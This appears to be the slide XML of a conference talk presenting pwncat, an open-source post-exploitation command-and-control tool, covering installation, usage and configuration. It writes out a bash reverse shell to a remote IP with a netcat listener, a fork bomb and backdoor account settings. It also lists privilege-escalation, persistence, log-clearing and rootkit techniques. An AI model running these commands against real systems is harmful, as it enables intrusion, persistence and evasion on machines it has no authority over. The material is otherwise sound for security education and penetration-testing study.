            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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What else can we do with this?</a:t>
            </a:r>
            <a:endParaRPr i="1"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65" name="Google Shape;265;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3085322" y="3263175"/>
            <a:ext cx="2768144" cy="1504800"/>
            <a:chOff x="421775" y="1149850"/>
            <a:chExt cx="3353700" cy="1504800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="266" name="Google Shape;266;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421775" y="1149850"/>
              <a:ext cx="3353700" cy="401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Privilege Escalation</a:t>
              </a:r>
              <a:endPara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7" name="Google Shape;267;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421775" y="1534450"/>
              <a:ext cx="3353700" cy="1120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nsolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>docker</a:t>
              </a:r>
              <a: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container privesc</a:t>
              </a:r>
              <a:b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</a:br>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>lxd</a:t>
              </a:r>
              <a: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container privesc</a:t>
              </a:r>
              <a:b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</a:br>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>sudo -u#-1</a:t>
              </a:r>
              <a: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(CVE-2019-14287)</a:t>
              </a:r>
              <a:b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</a:br>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a: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abuse (</a:t>
              </a:r>
              <a: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SUID </a:t>
              </a:r>
              <a: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GTFObins)</a:t>
              </a:r>
              <a:b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</a:br>
              <a:endPara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68" name="Google Shape;268;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3085295" y="1149850"/>
            <a:ext cx="2756406" cy="1981200"/>
            <a:chOff x="4231775" y="1149850"/>
            <a:chExt cx="3353700" cy="1981200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="269" name="Google Shape;269;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4231775" y="1149850"/>
              <a:ext cx="3353700" cy="401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Persistence</a:t>
              </a:r>
              <a:endPara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0" name="Google Shape;270;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4231775" y="1534450"/>
              <a:ext cx="3353700" cy="15966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Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>chattr +i</a:t>
              </a:r>
              <a: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stomp files</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Backdoor </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>PROMPT_COMMAND</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Backdoor </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>trap DEBUG</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Backdoor </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>git</a:t>
              </a:r>
              <a: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hooks</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Driver Injection</a:t>
              </a:r>
              <a:b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</a:br>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>apt</a:t>
              </a:r>
              <a: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Injection</a:t>
              </a:r>
              <a:endPara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71" name="Google Shape;271;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="345269" y="3055375"/>
            <a:ext cx="2586378" cy="1685418"/>
            <a:chOff x="421769" y="3131050"/>
            <a:chExt cx="3353706" cy="1745100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272" name="Google Shape;272;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421775" y="3131050"/>
              <a:ext cx="3353700" cy="401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Stealth</a:t>
              </a:r>
              <a:endPara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3" name="Google Shape;273;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421769" y="3515650"/>
              <a:ext cx="3353700" cy="13605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Clear log files and history</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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“Timestomp” </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>touch -t</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Unicode Homoglyphs</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Zero-Width Spaces</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Shell escape character injection</a:t>
              </a:r>
              <a:endPara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74" name="Google Shape;274;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="311700" y="1285604"/>
            <a:ext cx="2620251" cy="1685420"/>
            <a:chOff x="421768" y="3131050"/>
            <a:chExt cx="3353707" cy="1685420"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="275" name="Google Shape;275;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421775" y="3131050"/>
              <a:ext cx="3353700" cy="401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Aggression</a:t>
              </a:r>
              <a:endPara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6" name="Google Shape;276;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421768" y="3515670"/>
              <a:ext cx="3353700" cy="13008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Spam /dev/urandom to terminals</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Flush firewall rules</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Terminal Party Parrot</a:t>
              </a:r>
              <a:b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</a:br>
              <a:r>
                <a:rPr lang="en">
                  <a:solidFill>
                    <a:schemeClr val="lt2"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>:(){ :|: &amp; };:</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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wall</a:t>
              </a:r>
              <a:b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</a:br>
              <a:endPara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77" name="Google Shape;277;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5984398" y="3186975"/>
            <a:ext cx="2850983" cy="1335000"/>
            <a:chOff x="421775" y="1149850"/>
            <a:chExt cx="3353703" cy="1335000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="278" name="Google Shape;278;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421775" y="1149850"/>
              <a:ext cx="3353700" cy="401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Miscellaneous</a:t>
              </a:r>
              <a:endPara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9" name="Google Shape;279;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421778" y="1534450"/>
              <a:ext cx="3353700" cy="950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SOCKS5 Proxy for Internet</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Port-Forward through victim</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Install kernel rootkits (Reptile/PRISM)</a:t>
              </a:r>
              <a:endPara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80" name="Google Shape;280;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6007773" y="1302212"/>
            <a:ext cx="2806046" cy="1736541"/>
            <a:chOff x="4231775" y="1149850"/>
            <a:chExt cx="3353707" cy="1771800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="281" name="Google Shape;281;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4231775" y="1149850"/>
              <a:ext cx="3353700" cy="401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Transfer</a:t>
              </a:r>
              <a:endPara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82" name="Google Shape;282;p35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4231782" y="1534450"/>
              <a:ext cx="3353700" cy="1387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FTP</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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TFTP</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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DNS</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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SMB</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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ICMP</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en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</a:br>
              <a:endPara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311700" y="445025"/>
            <a:ext cx="460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git add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36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3878200" y="445025"/>
            <a:ext cx="500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Contributions &amp; pull-requests welcome!</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="1186375"/>
            <a:ext cx="7146300" cy="32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pwncat</a:t>
            </a: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is open-source, and always will be</a:t>
            </a:r>
            <a:b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 still consider it an active project… but life gets in the way</a:t>
            </a:r>
            <a:b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b="1" i="1" u="sng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0" name="Google Shape;290;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904950" y="2604600"/>
            <a:ext cx="7334100" cy="16131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you would like to contribute, we welcome your help!</a:t>
            </a:r>
            <a:endParaRPr b="1"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ls -la .contact_us</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="19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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2203700"/>
            <a:ext cx="4260300" cy="25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Caleb Stewart</a:t>
            </a:r>
            <a:endParaRPr b="1"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github.com/CalebStewart</a:t>
            </a:r>
            <a:b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twitter.com/CalebJStewart</a:t>
            </a:r>
            <a:b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linkedin.com/in/calebjstewart</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="99999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6"/>
              </a:rPr>
              <a:t>caleb.stewart94@gmail.com</a:t>
            </a:r>
            <a:endParaRPr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4572000" y="2203700"/>
            <a:ext cx="4260300" cy="25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John Hammond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7"/>
              </a:rPr>
              <a:t>github.com/JohnHammond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8"/>
              </a:rPr>
              <a:t>twitter.com/JohnHammond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9"/>
              </a:rPr>
              <a:t>linkedin.com/in/johnhammond010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10"/>
              </a:rPr>
              <a:t>johnhammond010@gmail.com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11"/>
              </a:rPr>
              <a:t>discord.gg/Kgtnfw4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12"/>
              </a:rPr>
              <a:t>youtube.com/johnhammond010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8" name="Google Shape;298;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995150" y="1228675"/>
            <a:ext cx="5153700" cy="9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13"/>
              </a:rPr>
              <a:t>https://github.com/calebstewart/pwncat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100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21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14"/>
              </a:rPr>
              <a:t>https://pwncat.readthedocs.io</a:t>
            </a:r>
            <a:endParaRPr sz="2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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="493775"/>
            <a:ext cx="7664400" cy="43053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____________</a:t>
            </a:r>
            <a:endParaRPr sz="3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 Thank You! &gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3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------------</a:t>
            </a:r>
            <a:endParaRPr sz="3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\   ^__^</a:t>
            </a:r>
            <a:endParaRPr sz="3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\  (oo)\_______</a:t>
            </a:r>
            <a:endParaRPr sz="3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(__)\       )\/\</a:t>
            </a:r>
            <a:endParaRPr sz="3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||----w |</a:t>
            </a:r>
            <a:endParaRPr sz="3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||     ||</a:t>
            </a:r>
            <a:endParaRPr sz="3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cat README.md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What is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pwncat</a:t>
            </a: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?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Why did you make this?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What can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pwncat</a:t>
            </a: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do?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How does it work?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Where is this useful?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What else could be implemented?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4155950" y="445025"/>
            <a:ext cx="4723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Our agenda and presentation outline</a:t>
            </a:r>
            <a:endParaRPr i="1"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275975" y="1762075"/>
            <a:ext cx="4423500" cy="21882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git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clone https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"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github.com/CalebStewart/pwncat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cd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pwncat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python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-m venv env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source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env/bin/activate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python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setup.py install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diff -r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40020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u="sng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https://github.com/calebstewart/pwncat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1" lang="en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!=</a:t>
            </a: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b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u="sng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https://github.com/cytopia/pwncat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2571750"/>
            <a:ext cx="4002000" cy="21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Two </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" u="sng">
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>different</a:t>
            </a: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projects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i="1" lang="en">
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Different maintainers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   Same name, same time of development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9550" y="1047500"/>
            <a:ext cx="4332101" cy="36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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Disclaimer on naming conflicts</a:t>
            </a:r>
            <a:endParaRPr i="1"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whatis pwncat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893825" y="1457275"/>
            <a:ext cx="7191600" cy="10224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 Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>pwncat is a command and control framework which </a:t>
            </a:r>
            <a:br>
              <a:rPr i="1"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1" i="1" lang="en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turns a basic bind or reverse shell into a fully-featured exploitation platform.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1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893825" y="2833800"/>
            <a:ext cx="7191600" cy="10224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 Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>pwncat is agentless</a:t>
            </a:r>
            <a:endParaRPr i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remote interaction is achieved through a standard shell (e.g. bash)</a:t>
            </a:r>
            <a:endParaRPr b="1" i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echo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"but why?"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Basic bind and reverse shells </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" u="sng">
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>suck</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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0" y="1689975"/>
            <a:ext cx="4221600" cy="65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attacker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nc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-lnvp 9999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604575" y="2204225"/>
            <a:ext cx="4539300" cy="65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432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victim	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bash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-i &gt;&amp; /dev/tcp/10.0.0.1/9999 0&gt;&amp;1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0" y="2832975"/>
            <a:ext cx="4221600" cy="184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reverse shell on the victim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su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error: not a tty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vim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any_file.txt</a:t>
            </a:r>
            <a:b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error: not a tty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^L^[[D^[[D^[[C^[[C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^C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4619475" y="445025"/>
            <a:ext cx="4260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Rationale behind the project</a:t>
            </a:r>
            <a:endParaRPr i="1"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578900" y="3026300"/>
            <a:ext cx="4260300" cy="16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With a typical bind or reverse shell, you lose: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i="1" lang="en">
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>   tab completion,</a:t>
            </a:r>
            <a:br>
              <a:rPr i="1"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i="1" lang="en">
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>     command history,</a:t>
            </a:r>
            <a:br>
              <a:rPr i="1"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i="1" lang="en">
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>      ncurses functionality,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  a</a:t>
            </a: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nd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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Control+C</a:t>
            </a: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breaks your shell!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pwncat --help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0" y="1246500"/>
            <a:ext cx="4572000" cy="6528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Connect to remote bind shell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pwncat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--connect -H 127.0.0.1 -p 4444</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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5177625" y="1823225"/>
            <a:ext cx="3966300" cy="6528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Listen for a reverse shell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pwncat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--listen -p 4444</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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0" y="2743675"/>
            <a:ext cx="5966400" cy="6528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Connect via SSH w/ known credentials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pwncat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--ssh -i id_rsa -u user -H 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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976925" y="3680825"/>
            <a:ext cx="5178900" cy="6528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Reconnect to a host via installed persistence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pwncat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--reconnect -H 127.0.0.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="14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4619475" y="445025"/>
            <a:ext cx="4260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How do I use this?</a:t>
            </a:r>
            <a:endParaRPr i="1"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shift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0" y="1246500"/>
            <a:ext cx="6799800" cy="18645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pwncat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--listen -p 4444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[11:13:05]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received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connection from </a:t>
            </a:r>
            <a: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10.0.1.1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400">
                <a:solidFill>
                  <a:srgbClr val="D0E0E3"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>47388</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="D0E0E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[11:13:05]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new host w/ hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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fc9e879381fff6b29f485c8c237a2fd4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[11:13:07]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pwncat running in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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/bin/bash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pwncat is ready 🐈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(remote)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victim@target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400">
                <a:solidFill>
                  <a:srgbClr val="D0E0E3"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>~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$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2972950" y="445025"/>
            <a:ext cx="590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Switch between the target and pwncat commands</a:t>
            </a:r>
            <a:endParaRPr i="1"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353550" y="3283700"/>
            <a:ext cx="5790300" cy="3864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Press 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Ctrl+D</a:t>
            </a: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to toggle between remote-mode and local-mode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0" y="3837300"/>
            <a:ext cx="6234000" cy="8838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(remote)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victim@target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400">
                <a:solidFill>
                  <a:srgbClr val="D0E0E3"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>~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^D</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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[11:13:12]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local terminal restored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(local)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pwncat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$ </a:t>
            </a:r>
            <a:endParaRPr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cat pwncatrc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2972950" y="445025"/>
            <a:ext cx="590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Configuration script file</a:t>
            </a:r>
            <a:endParaRPr i="1"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14800"/>
            <a:ext cx="4260300" cy="3766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Set your command prefix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1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prefix c-k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Set the pwncat backdoor user and password</a:t>
            </a:r>
            <a:endParaRPr sz="11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backdoor_user </a:t>
            </a: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"pwncat"</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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backdoor_pass </a:t>
            </a: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"pwncat"</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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db </a:t>
            </a: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"sqlite:///pwncat.sqlite"</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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on_load {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privesc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-l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# Examples of command bindings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bind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"sync"</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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bind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r>
              <a:rPr lang="en" sz="11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"set state command"</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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# Create aliases for commands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alias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up upload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alias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down download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shortcut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! local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shortcut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@ run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3700" y="1338775"/>
            <a:ext cx="4260300" cy="3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Set common configuration values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Schedule commands to run on connection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Create key-bindings, aliases, and shortcuts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